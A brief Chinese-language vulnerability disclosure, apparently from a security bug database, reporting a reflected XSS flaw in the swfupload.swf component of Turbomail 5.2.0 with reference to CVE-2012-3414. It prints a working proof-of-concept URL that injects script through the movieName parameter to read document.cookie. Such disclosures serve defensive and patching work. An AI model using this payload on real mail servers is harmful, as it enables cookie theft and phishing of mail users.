### 简要描述:
Turbomail邮件系统最新版某处存在xss漏洞,可以用来钓鱼,获取cookie等
### 详细说明:
版本:windows server下搭建的最新版5.2.0
漏洞文件为
C:\turbomail\web\webapps\ROOT\enterprise\swfupload\swfupload.swf
此版本存在xss缺陷,参考CVE-2012-3414
http://mail.fuck.com:8080/enterprise/swfupload/swfupload/swfupload.swf?movieName=%22%5d%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;//
[<img src="https://images.seebug.org/upload/201412/21231543e3d5323acc40e0e57f14953dafe17b65.png" alt="ssv.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/21231543e3d5323acc40e0e57f14953dafe17b65.png)
[<img src="https://images.seebug.org/upload/201412/21231435a93e9ff8afab88501cb6f801ff6b8029.png" alt="t1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/21231435a93e9ff8afab88501cb6f801ff6b8029.png)
### 漏洞证明:
如上
京公网安备 11010502034610号
暂无评论